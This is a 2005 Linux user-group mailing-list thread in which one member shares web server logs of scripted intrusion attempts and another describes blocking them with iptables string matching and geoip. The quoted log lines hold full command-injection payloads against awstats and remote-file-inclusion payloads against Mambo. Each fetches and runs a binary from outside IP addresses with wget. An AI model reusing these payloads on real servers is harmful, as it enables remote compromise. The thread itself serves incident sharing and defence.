[plug] Scripted hacking attempts
William Kenworthy
billk at iinet.net.au
Wed Dec 21 19:21:02 WST 2005
They've been around for a few weeks. I drop them using a string match
on port 80 (iptables), and once theve triggered it, all packets to/from
that source are dropped - no point in letting them try something else
that I might have missed! I think most came from china from memory -
geoip helps there, as well as blocking the messenger spam.
BillK
On Wed, 2005-12-21 at 17:02 +0800, Kai wrote:
> Hi guys and girls,
>
> FYI, I don't know if anyone else is seeing a rash of these but I've had
> a few in the last coupla days.
>
> 12.175.196.99 - - [21/Dec/2005:10:55:02 +0800] "GET
> /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
> HTTP/1.1" 404 340
> 12.175.196.99 - - [21/Dec/2005:10:55:06 +0800] "GET
> /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
> HTTP/1.1" 404 340
> 12.175.196.99 - - [21/Dec/2005:10:55:13 +0800] "GET
> /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
> HTTP/1.1" 404 331
> 12.175.196.99 - - [21/Dec/2005:10:55:08 +0800] "GET
> /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|
> HTTP/1.1" 404 348
> 12.175.196.99 - - [21/Dec/2005:10:55:10 +0800] "GET
> /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
> HTTP/1.1" 404 332
> 12.175.196.99 - - [21/Dec/2005:10:55:14 +0800] "GET
> /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
> HTTP/1.1" 404 338
> 12.175.196.99 - - [21/Dec/2005:10:55:17 +0800] "GET
> /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
> HTTP/1.1" 404 336
> 12.175.196.99 - - [21/Dec/2005:10:55:23 +0800] "GET
> /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.12/listen;chmod%20744%20listen;./listen;echo%20YYY;echo|
> HTTP/1.1" 404 342
>
> Cheers
> Kai
>
--
William Kenworthy <billk at iinet.net.au>
Home!
More information about the plug
mailing list